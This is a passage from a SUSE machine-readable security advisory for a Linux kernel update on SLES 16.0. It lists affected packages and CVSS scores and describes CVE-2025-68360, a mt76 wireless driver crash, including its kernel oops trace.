"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68359"
},
{
"cve": "CVE-2025-68360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks\n\nMT7996 driver can use both wed and wed_hif2 devices to offload traffic\nfrom/to the wireless NIC. In the current codebase we assume to always\nuse the primary wed device in wed callbacks resulting in the following\ncrash if the hw runs wed_hif2 (e.g. 6GHz link).\n\n[ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a\n[ 297.464928] Mem abort info:\n[ 297.467722] ESR = 0x0000000096000005\n[ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 297.476766] SET = 0, FnV = 0\n[ 297.479809] EA = 0, S1PTW = 0\n[ 297.482940] FSC = 0x05: level 1 translation fault\n[ 297.487809] Data abort info:\n[ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000\n[ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, pmd=0000000000000000\n[ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP\n[ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0\n[ 297.723908] Tainted: [O]=OOT_MODULE\n[ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT)\n[ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table]\n[ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80\n[ 297.757126] sp : ffffffc080fe3ae0\n[ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7\n[ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00\n[ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018\n[ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000\n[ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000\n[ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da\n[ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200\n[ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002\n[ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000\n[ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8\n[ 297.831686] Call trace:\n[ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.839254] mtk_wed_flow_remove+0x58/0x80\n[ 297.843342] mtk_flow_offload_cmd+0x434/0x574\n[ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40\n[ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table]\n[ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table]\n[ 297.864463] process_one_work+0x174/0x300\n[ 297.868465] worker_thread+0x278/0x430\n[ 297.872204] kthread+0xd8/0xdc\n[ 297.875251] ret_from_fork+0x10/0x20\n[ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421)\n[ 297.884901] ---[ end trace 0000000000000000 ]---\n\nFix the issue detecting the proper wed reference to use running wed\ncallabacks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
